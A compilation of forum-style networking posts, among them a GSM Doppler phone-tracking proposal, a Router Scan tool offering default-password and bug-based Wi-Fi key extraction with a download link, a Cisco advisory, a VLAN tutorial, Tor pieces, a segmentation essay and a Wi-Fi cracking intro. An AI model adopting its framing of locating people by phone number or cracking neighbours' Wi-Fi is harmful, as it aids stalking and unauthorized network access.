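    for n in (881, 114):
        print(arfcn_to_channel(n).describe(), end="\n\n")
    print("1879000000 Hz ->", downlink_to_arfcn(1_879_000_000))
```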
  15. GSM or Global System for Mobile Communication is a technology that’s widely used in mobile communications, especially mobile phones. This technology utilizes microwaves and signal transmission divided by time, so that the signal information sent will arrive at the destination. The GSM standard for mobile communications, as well as mobile technology, is deployed more than its counterparts around the world, like CDMA. At this time we will discuss how to track a cell phone by using the Doppler effect; in other words, we will make it easier to know the whereabouts of a person just by having information such as their cell phone number.

GSM Network Architecture

Typical GSM network architecture is divided into 3 parts:
- Mobile Station (MS)
- Base Station Sub-system (BSS)
- Network Sub-system (NSS)

All elements of the network at the top form a PLMN (Public Land Mobile Network).

Picture 1. GSM network architecture

Mobile Station or MS is the device used by the customer for making phone calls. This device consists of:
- Mobile Equipment (ME) or the handset (UM) is a GSM device that is located at the user or customer end and serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices.
- Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. The ME can’t be used without a SIM in it, except for emergency calls. The data stored in the SIM in general are:
  - International Mobile Subscriber Identity (IMSI)
  - Mobile Subscriber ISDN (MSISDN)
  - Encryption mechanism

Base Station System or BSS consists of:
- Base Transceiver Station (BTS), a GSM device that is directly related to the MS and serves as the sender and receiver.
- Base Station Controller (BSC), a controller device for base stations which is located between the BTS and MSC.

Network Sub System or NSS consists of:
- Mobile Switching Center (MSC), a central network element in a GSM network.
The MSC works as the core of a cellular network, where its main role is interconnection, both among cellular or wired networks (PSTN) and with the data network.
- Home Location Register (HLR), a database that saves the data and customer information permanently.
- Visitor Location Register (VLR), a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves.
- Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer.
- Equipment Identity Registration (EIR) is often integrated into the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) which are to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones.

GSM Layers

There are 3 layers in the GSM network:
- Layer 1 or the physical layer, for setting the channels.
- Layer 2 or the data-link layer, whose main role is to identify the data that is sent from UM to BTS.
- Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC), which serve as regulators for radio, mobile management and call control.

Picture 2. Illustration of how GSM works

The mobile phone is input with the destination number and connects to the nearest BTS. BSC and BTS send to the MSC, which proceeds to the AuC for checking the user identification. The MSC proceeds to the HLR / VLR to check for the existence of the mobile phone. BSC and MSC proceed to the nearest BTS where the destination mobile is located.

How Doppler Works

Doppler is a change in the frequency or wavelength of a wave source that is received by the observer. This is the Doppler effect formula which is not affected by wind:

Doppler effect formula which is influenced by the wind:

This is the illustration of the Doppler effect:

Picture 3. Doppler effect illust

From the above picture, there are 3 persons: A, B and C.
A is the person in the middle, who could detect the source of the wave/sound from B or C. Because the wave/sound that came from B or C travels at a certain frequency and distance, person A could distinguish the source of the wave/sound.

Concept

In this article, we are proposing a GSM radar using the Doppler effect, where the Doppler effect itself will be used to listen for the mobile phone uplink. There is some literature and there are references that mention the Doppler effect being used to identify a signal if the Doppler effect is combined with the right filter processing according to the characteristics of the signal being transmitted.

Research

1. OpenBTS Installation

This article won’t go step by step through the OpenBTS installation until it can be used, because there are already a lot of tutorials which cover the installation process. For this research, we are using the USRP N200 from Ettus Research. But as we proceeded using OpenBTS with the USRP N200, we realized that there was an anomaly in the signal transmitted by the USRP N200. So, we used a spectrum analyzer to figure it out and find a solution for the signal anomaly. This is the setup we are using:

Picture 4. Using a spectrum analyzer to figure out the USRP N200 signal anomaly
Picture 5. Signal anomaly as seen on the spectrum analyzer

As you can see from the picture above, the signal generated by the USRP N200 looks like a horn and the noise is quite high. The possible cause for that anomaly is that the USRP N200 clock is not accurate, and the solution for that is adding a filter, so the final result will be a correct GSM modulation like in this picture:

Picture 6. Correct GSM modulation after adding a filter

2. Doppler Design

After doing some research on Doppler design, we found out that some designs are not capable of a frequency of 900 MHz, but we have a workaround and modified an existing Doppler design so it is capable of reaching 900 MHz and even higher. This is the block diagram for the modified Doppler design (courtesy of Ramsey):

Picture 7. Modified Doppler design
Picture 8. Tracking mobile phone illustration

Conclusion

From the above explanation, we could conclude that the Doppler effect could be used to look up the position of a device transmitting a signal at a certain frequency. We could take this research further to detect any kind of living creature (e.g. endangered species) that in some way is transmitting a signal at a certain frequency, as long as we have a sound sample of that creature.

Source
  16. Router Scan is able to find and identify a variety of devices from a variety of known routers, and most importantly, to pull useful information out of them, in particular the characteristics of the wireless network: the way the access point is protected (encryption), the access point name (SSID) and the access point key (passphrase). It also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router.

Getting the information occurs in two possible ways: the program will try to pick a login / password pair for the router from the list of standard passwords, thereby gaining access. Or a non-destructive vulnerability (or bug) for the router model will be used, allowing it to obtain the necessary information and / or to bypass the authorization process.

TinyUpload.com
pass: Stas'M Corp.

Virus total: https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/
  17. Cisco's turned up vulnerabilities in automation software that open the door to denial-of-service and limited access to devices.

The company's Autonomic Network Infrastructure (ANI) feature in IOS provides self-management for various IPv6-supporting routers and Ethernet switches. One of the ANI features is to remove the need for pre-staging in network bootstrap, allowing devices to join a network on start, so they can be configured over the network rather than through a local port. The three vulnerabilities exploit this in various ways:
- Registration authority spoofing (CVE-2015-0635) – insufficient validation of the Autonomic Networking (AN) response message allows an attacker to spoof the message, either bootstrapping a device into an untrusted domain (with limited control over it), DoS-ing the device, or disrupting the victim's domain;
- DoS using spoofed messages (CVE-2015-0636) – in IOS and IOS XE software, a spoofed “overloaded AN” message resets the state machine;
- Device reload (CVE-2015-0637) – received AN messages are insufficiently validated, allowing an attacker to trigger system reloads using crafted messages.

Devices running Cisco IOS and IOS XE, with ANI enabled, are vulnerable. Cisco has released patches for the vulnerable systems listed in its advisory, here.

Source
  18. This will be the shortest tut made by me because it needs only a few changes.

To begin, we will install the VLAN package. This will be done using the command:

    # apt-get install vlan -y

After this we will load the 8021q module into the kernel using the command:

    # sh -c 'grep -q 8021q /etc/modules || echo 8021q >> /etc/modules'

Now the only thing required is to add the VLANs into the /etc/network/interfaces file as in the next example:

    auto eth1
    iface eth1 inet static
        address 192.168.0.101
        netmask 255.255.255.0
        network 192.168.0.0
        broadcast 192.168.0.255
        gateway 192.168.0.254
        dns-nameserver 8.8.8.8

    # VLAN 69
    auto vlan69
    iface vlan69 inet static
        address 172.16.69.25
        netmask 255.255.255.248
        network 172.16.69.24
        broadcast 172.16.69.31
        vlan_raw_device eth2

    # VLAN 96
    auto vlan96
    iface vlan96 inet static
        address 10.10.96.1
        netmask 255.255.255.0
        network 10.10.96.0
        broadcast 10.10.96.255
        mtu 1500
        vlan_raw_device eth2

Now for the job to be done we will restart networking and all will be done:

    # /etc/init.d/networking restart
     * Reconfiguring network interfaces...
    ssh start/running, process 1400
    Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config
    Added VLAN with VID == 69 to IF -:eth2:-
    ssh stop/waiting
    ssh start/running, process 1465
    Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config
    Added VLAN with VID == 96 to IF -:eth2:-
    ssh stop/waiting
    ssh start/running, process 1530
    [ OK ]

To check if they are up we will read the file vlan/config using the command # cat /proc/net/vlan/config. The output will be the following if all is good:

    VLAN Dev name    | VLAN ID
    Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD
    vlan69           | 69  | eth2
    vlan96           | 96  | eth2

Author: razvan1@hy
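A consistency check for the interfaces file above, added as an example for this thread (it is not part of the post): it parses the stanzas, recomputes network/broadcast from address and netmask, requires a vlan_raw_device on every vlanNN stanza, and compares the declared VLANs with the /proc/net/vlan/config output. The sample texts are constructed from the post's configuration, with the eth1 stanza shortened.

```python
"""Consistency checker for the VLAN stanzas in /etc/network/interfaces.

Added example for this thread, not code from the original post. It parses the
stanza format used above, recomputes network/broadcast from address/netmask,
checks that each vlanNN stanza names a raw device, and compares the declared
VLANs with what /proc/net/vlan/config reports."""
import ipaddress
import re

# Constructed sample: the interfaces file from the post (eth1 stanza shortened)
SAMPLE_INTERFACES = """\
auto eth1
iface eth1 inet static
    address 192.168.0.101
    netmask 255.255.255.0
# VLAN 69
auto vlan69
iface vlan69 inet static
    address 172.16.69.25
    netmask 255.255.255.248
    network 172.16.69.24
    broadcast 172.16.69.31
    vlan_raw_device eth2
# VLAN 96
auto vlan96
iface vlan96 inet static
    address 10.10.96.1
    netmask 255.255.255.0
    network 10.10.96.0
    broadcast 10.10.96.255
    vlan_raw_device eth2
"""

# Constructed sample: the /proc/net/vlan/config output from the post
SAMPLE_VLAN_CONFIG = """\
VLAN Dev name    | VLAN ID
Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD
vlan69           | 69  | eth2
vlan96           | 96  | eth2
"""

VLAN_NAME = re.compile(r"vlan(\d+)")   # naming scheme used in the post


def parse_interfaces(text: str) -> dict:
    """Return {iface: {option: value}} for every 'iface <name> inet <method>' stanza."""
    stanzas, current = {}, None
    for raw in text.splitlines():
        words = raw.split("#", 1)[0].split()        # drop comments and blank lines
        if not words:
            continue
        if words[0] == "iface":
            if len(words) < 4:
                raise ValueError(f"malformed iface line: {raw.strip()!r}")
            current = stanzas.setdefault(words[1], {"method": words[3]})
        elif words[0] in ("auto", "allow-hotplug", "mapping", "source"):
            current = None                            # these keywords end the open stanza
        elif current is not None:
            current[words[0]] = " ".join(words[1:])
    return stanzas


def check_vlan_stanzas(stanzas: dict) -> list:
    """Return a list of problems; an empty list means the config is consistent."""
    problems = []
    for name, opts in stanzas.items():
        match = VLAN_NAME.fullmatch(name)
        if match is None:
            continue                                  # plain interface such as eth1
        if not 1 <= int(match.group(1)) <= 4094:
            problems.append(f"{name}: VLAN ID out of range 1-4094")
        if "vlan_raw_device" not in opts:
            problems.append(f"{name}: missing vlan_raw_device")
        if "address" in opts and "netmask" in opts:
            net = ipaddress.ip_network(f"{opts['address']}/{opts['netmask']}", strict=False)
            for key, expected in (("network", net.network_address),
                                  ("broadcast", net.broadcast_address)):
                if key in opts and ipaddress.ip_address(opts[key]) != expected:
                    problems.append(f"{name}: {key} {opts[key]} does not fit {net} "
                                    f"(expected {expected})")
    return problems


def parse_vlan_config(text: str) -> dict:
    """Parse /proc/net/vlan/config into {vlan_iface: (vid, raw_device)}."""
    kernel = {}
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) == 3 and parts[1].isdigit():    # skips the two header lines
            kernel[parts[0]] = (int(parts[1]), parts[2])
    return kernel


def not_up(stanzas: dict, kernel: dict) -> list:
    """Declared vlanNN stanzas the kernel has not bound to VID NN on the expected raw device."""
    return [name for name, opts in stanzas.items()
            if (m := VLAN_NAME.fullmatch(name))
            and kernel.get(name) != (int(m.group(1)), opts.get("vlan_raw_device"))]
```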
  19. The Cisco Network Simulator, Router Simulator & Switch Simulator

The Boson NetSim Network Simulator is an application that simulates Cisco Systems' networking hardware and software and is designed to aid the user in learning the Cisco IOS command structure. NetSim utilizes Boson's proprietary Network Simulator, Router Simulator® and EROUTER® software technologies, along with the Boson Virtual Packet Technology® engine, to create individual packets. These packets are routed and switched through the simulated network, allowing NetSim to build an appropriate virtual routing table and simulate true networking. Other simulation products on the market do not support this level of functionality.

Source: NetSim Cisco Network Simulator & Router Simulator
Download: GirlShare - Download Boson NetSim 8.0.rar
  20. Are you aware of everything that your users are accessing from your environment? While most of the time non-work-related Internet browsing is harmless (looking at pictures of cats, online shopping, social media, etc.), there are some instances where you could be an unknowing and unwilling participant in criminal activity. That is, when users hide that activity via the Tor network, or the Dark Net.

The Onion Router, better known as "Tor", an open source project launched in 2002, is designed to allow a user to browse the Internet anonymously via a volunteer network of more than 5000 relays. It doesn't share your identifying information, like your IP address and physical location, with websites or service providers. For a user that navigates the Internet using Tor, it's quite difficult to trace their activities, ensuring their online privacy. There are arguably legitimate uses for this technology, such as providing Internet access in repressively regulated countries.

Tor has been a favorite target of intelligence agencies. The NSA targeted Tor users using a zero-day vulnerability in the Firefox browser bundled with Tor that allowed them to get the real IP address of anonymous Tor users. Using the same techniques, the FBI was also able to track the owner of 'Freedom Hosting', the biggest service provider for sites on the encrypted Tor network, which hosted many child pornography sites. However, Mozilla has since fixed that Firefox flaw exploited by government law enforcement officials.

Moreover, Tor is often associated with illicit activity (child pornography, selling controlled substances, identity theft, money laundering, and so on). Most admins will want to prohibit their users from using the Tor network due to its association with nefarious activity. Since the point of origin is nearly impossible to determine with conventional means, many bad actors leverage the Tor network to hide the location of Command & Control servers, machines taking ransomware payments, etc.
This makes identifying them and their malware that much harder. Users browsing the Tor network (for illicit purposes or not) from your environment can open you up to hosting malicious/illegal content, ransomware infection, or unknowingly participating in other malicious activity. Therefore it is also known as DeepNet or Deep Web. To know more detail about the Deep Web you can read our detailed article, "What is the Deep Web? A first trip into the abyss".

WHAT CAN I DO ABOUT TOR?

AlienVault Unified Security Management™ (USM) can help. USM provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console, plus weekly threat intelligence updates developed by the AlienVault Labs threat research team. The correlation directives and IDS signatures in AlienVault Unified Security Management (USM) can detect when a system is attempting to resolve a Tor domain, and allow you to take corrective action. Plus, new & updated correlation directives developed by the experts at AlienVault Labs are pushed to USM weekly, enabling detection of emerging threats.

Learn more about AlienVault USM:
- Download a free 30-day trial
- Watch a demo on-demand
- Play with USM in our product sandbox (no download required)

Source
  21. Understanding Network Hacks: Attack and Defense with Python
Author: Bastian Ballmann
Download: http://www.docdroid.net/rfpu/understanding-network-hacks.pdf.html
  22. Tor — a privacy-oriented encrypted anonymizing service, has announced the launch of the next version of its Tor Browser Bundle, i.e. Tor version 4.0.4, mostly intended to improve the built-in utilities, privacy and security of online users on the Internet.

Tor Browser helps users to browse the Internet in a completely anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates to its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.

NEW FEATURES

The latest version, Tor Browser Bundle 4.0.4, has been recently released with a small number of new features:
- Updated Firefox to 31.5.0esr with important security updates.
- Update OpenSSL to 1.0.1
- Update NoScript to 2.6.9.15
- Update HTTPS-Everywhere to 4.0.3

BUG FIXES

Meanwhile, the new Tor version 4.0.4 also includes some bugfixes:
- Bug 14203: Prevent meek from displaying an extra update notification
- Bug 14849: Remove new NoScript menu option to make permissions permanent
- Bug 14851: Set NoScript pref to disable permanent permissions

"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team.

Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services and is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries.
However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its specialized network servers called Directory Authorities (DA), the servers that help Tor clients find Tor relays in the anonymous network service.

On the other side, last month 12 high-capacity Tor middle relays were launched by Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce the finite number of Tor connections occurring at the same time.

-> Source <-
  23. Introduction

Last year – dubbed “the Year of the Hack” – saw numerous major cyber attacks against prominent corporations, including JP Morgan bank and Sony Pictures Entertainment. And after Target in 2013, another retailer, Home Depot, suffered a data breach with more than 56 million credit cards stolen. The consequences of these incidents can be devastating in terms of reputation damage and the lawsuits that have been filed, charging negligent IT security control. Hackers exposed lots of poorly protected systems, and we should ask ourselves: What’s wrong here? It seems likely that data traffic security and network security have not kept abreast of technological innovation. This article attempts to gain insight into some of the current issues related to the subject matter, such as proper data encryption, network segmentation, traffic originating from mobile devices, etc.

Network Segmentation & Data Encryption

Regulatory guidelines that ensure a general standard of compliance focus on traffic encryption for data that traverses external or public networks, whereas local, inner-core networks are protected by means of logical network segmentation. Isolation of sensitive data on specific internal network repositories and cryptographic segmentation are common security standards today for many institutions that operate with loads of private and confidential information, e.g., banks and hospitals. Network segmentation is possible through technologies like firewalls and routing subnets. On the other hand, the encryption process for data in motion utilizes a large number of forms of encryption, ranging from Web-based/HTTPS encryption to SSL-based VPNs.

Enhanced Security with Proper Network Segmentation

a) Unauthorized network access can be limited through network segmentation or security “zoning”. This mitigation technique will withhold the propagation of a threat, for instance, malicious actors attempting to move across the network.
At the same time, segregating the network properly will enable access to those persons who are authorized. Firewalls and VLANs have a function that can partition the network into multiple zones.

Multiple layers of control within the network – IT security corporations are more and more interested in dealing with network segmentation errors. But security is not the only problem with configuring proper network segmentation. Beware that while adding more security layers can impede access by cybercriminals, it can also have a negative impact on business dealings if the configuration is not user-friendly enough. Hence, we are obligated to take into consideration other key benefits associated with well-segmented networks, namely, “the ability to contain network problems, improve performance, and reduce congestion.”

Diagram 1 “Example of Network Segmentation (Part 1)”
Diagram 2 “Example of Network Segmentation (Part 2)”

VLAN Network Segmentation and Security

Network segmentation with virtual local area networks (VLANs) breaks a network into a number of isolated, smaller networks within the data center. Each of these networks operates as a separate logical broadcast domain. Proper VLAN segmentation can significantly hinder threat actors from accessing the system surface, and simultaneously diminishes their packet-sniffing capabilities. Furthermore, VLANs authorize legitimate users to access only those servers and devices related to their duties. VLANs have a positive unloading effect on network performance because the massive broadcast domains are divided into easily-manoeuvrable small parts. VLANs provide organizational flexibility, allowing administrators to group segmented mini-networks based on categories such as function, application, and project team. Lastly, VLANs can give secure but convenient user mobility to users assigned to a particular VLAN, since they can remain connected to that VLAN irrespective of location.

What do the critics say about VLANs?
VLANs are unable to enforce reliable control of privileged information because they simply isolate network traffic. It is deemed that they cannot inspect this traffic for threats. Moreover, along with other traditional tools, e.g., internal firewalls, VLANs can be a point of failure as far as security, flexibility, and management are concerned. That is because: “they necessitate physically changing the network topology to create or modify a secure domain; firewall rules to control user access incur time-consuming work-around fixes for authorized users; and security measures such as encrypting internal traffic isn’t always possible.”

Next-Generation Networks

Software Defined Networking (SDN), Network Virtualization (NV), and Network Functions Virtualization (NFV) present an advanced software-based approach to IT virtualization of the entire network architecture. A citation from this document illustrates in a few words the basic characteristics of these cutting-edge technologies:

Software Defined Networking (SDN)

In October 2013, the Open Networking Foundation (ONF) issued a research report in which two potential security challenges related to SDN were addressed:
- The centralized controller as a “potential single point of attack and failure.”
- The southbound interface between the controller and data-forwarding devices is “vulnerable to threats that could degrade the availability, performance and integrity of the network.”

Measures within the SDN’s architecture:
- Secure the access to the Controller — protecting the Controller means protecting your SDN;
- Create a trusted network environment between the SDN Controller, the applications and the devices, which will protect the communications throughout the network;
- Enforce a robust policy framework to constantly check on the proper functioning of the SDN Controller;
- Enforce Remediation + Forensics procedures when necessary (i.e., recovery mechanisms, reporting, and analysis).
Security outside the architecture can be embedded either in servers, storage or other computing apparatuses.

Network Functions Virtualization (NFV)

There are two basic security threats for NFVs:
1) A combination of all generic virtualization threats;
2) Threats specific to the network function software.

However, virtualization gives some complementary security by eliminating or mitigating several kinds of threats typical for the network function software with the help of new elements like centralized security management and hypervisor introspection. For improving NFV security, Andreas Lemke advises users to utilize the following two-pronged combination:
“Reducing generic virtualization threats as much as possible by securing the virtualization platform
Eliminating as many network function-specific threats as possible by applying NFV-enabled security mechanisms, such as hypervisor-based protection”

Drafting a stringent security policy on what is to be transferred from zone to zone is the next step.
- Accidental access of third parties to your network must be restricted to cases when it is absolutely needed and areas where there is no other information beyond what is required.
- A zone that contains highly sensitive data should be isolated as much as possible from the rest of the network, but it should not pose an undue burden on the overall data traffic.
- Tag zones differently depending on the type of data they contain. With regard to the previous point, be sure that a sensitive type of information is not within the reach of an unauthorized third party.
- Define “good faith”, innocuous communication paths and block suspicious data traffic.
- Building an enormous matrix of segregated zones may entail drafting a policy for traffic management between zones. Due to security changes over time, frequent changes in the policy have to be made as well so that the policy in question can respond to the present security dynamics of this new network environment.
There are standards that can provide guidance on how to set up efficient separation of data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is one such standard, and in this case sensitive information like payment card data should be isolated from the rest of the network.

Case Study: Target Data Breach

As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to secure in a proper fashion the access of third parties to their payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is in itself noncompliance with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company’s Point-of-Sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place.

Enhanced Security with Proper Encryption

The classical security architecture counts on the establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question, as if the old maxim “Hope for the best and prepare for (assume) the worst” is better justified in terms of real-deal proactive security measures like encryption, especially for the preservation of sensitive data.
A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existing fragmented environment.

Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to make. The following statistic reflects on the aforementioned subject: “45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on.” Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption.

II. Mobile Data Traffic and Network Security

The mobile unencrypted traffic from apps is growing each month.
At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords.

Diagram 3
Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati).

Bring Your Own Device (BYOD)

Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data entrusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (that could be IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environments is vital for complying with the current standards in terms of efficiency and security.

The silo style of mobility

Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company.
The silo-based nature of all mobile devices, however, localize the perimeter protection to the company’s boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor can obtain and leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not possess antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered “safe” and “trusted” (See Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and secure or isolate internal applications containing sensitive servers. Diagram 4 Conclusion The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Allocating funds to network security projects for this years is envisaged by approximately two-thirds of all enterprises participating in the interview. We can only hope that these measures will not come as “too little, too late”. And while the investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our personal perception to these changes. Reference List Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/ Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10 Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/ Cryptozone. Network Segmentation. 
Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687 McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf Olzak, T. (2012). VLAN Network Segmentation and Security- Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/ Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/ Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation SDNCentral. SDN Security Challenges in SDN Environments. 
Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/ TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html Diagram 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634 Source
  24. Internet is now the basic need of our daily life. With the increasing use of smartphones, most things are now online. Every time we have to do something, we just use our smartphone or desktop. This is the reason wi-fi hotspots can be found everywhere. People also use wireless in their home network to connect all devices. Every person can see the neighborhood wi-fi networks in the system, and they want to use them for free. But most of these networks are secured with a password key. You need to know this security key to access the network. When your own network is down, you will desperately want to connect to these neighborhood networks. For this, people generally search for wi-fi password cracking tools to get unauthorized access to those wireless networks.

Sometimes when you are on a network, you also want to check what is happening on the network. This happens mostly in big organizations, when an employer wants to check who is doing what in the network. For these things, there are a few network hacking tools available that let users analyze packets and see what other users are doing.

In this article, I am going to discuss wireless security and the best wi-fi password cracking or recovery tools. I will explain the kind of encryption wireless networks use and how these tools can crack the networks to get access. We will also see what tools let users monitor networks.

Wireless Networks and Hacking

Wireless networks are based on IEEE 802.11 standards defined by the IEEE (Institute of Electrical and Electronics Engineers) for ad hoc networks or infrastructure networks. Infrastructure networks have one or more access points which coordinate the traffic between the nodes. But in ad hoc networks, there is no access point; each node connects in a peer-to-peer way.

Basically there are two types of vulnerabilities which can be found in the wireless LAN. One is poor configuration and the other is poor encryption. Poor configuration is caused by the network admin who manages the network. It may include a weak password, no security settings, use of default configurations, and other user-related things. Poor encryption is related to the security keys used to protect the wireless network. It is there because of issues in WEP or WPA.

WEP and WPA

WEP and WPA are the two main security protocols used in Wi-Fi LANs. WEP is known as Wired Equivalent Privacy (WEP). It is a deprecated security protocol which was introduced back in 1997 as a part of the original 802.11 standards. But it was weak, and several serious weaknesses were found in the protocol. Now, this can be cracked within minutes. So, a new kind of security protocol was introduced in 2003. This new protocol was Wi-Fi Protected Access (WPA). It has mainly two versions, 1 and 2 (WPA and WPA2). Now it is the current security protocol used in wireless networks. To get unauthorized access to a network, one needs to crack these security protocols. There are many tools which can crack Wi-Fi encryption. These tools can either take advantage of WEP weaknesses or use bruteforce attacks on WPA/WPA2. I am sure now you know that you should never use WEP security.

Basically wireless hacking tools are of two types. One kind can be used to sniff the network and monitor what is happening in the network. And the other kind of tools are used to hack WEP/WPA keys. These are the popular tools used for wireless password cracking and network troubleshooting.

1. Aircrack

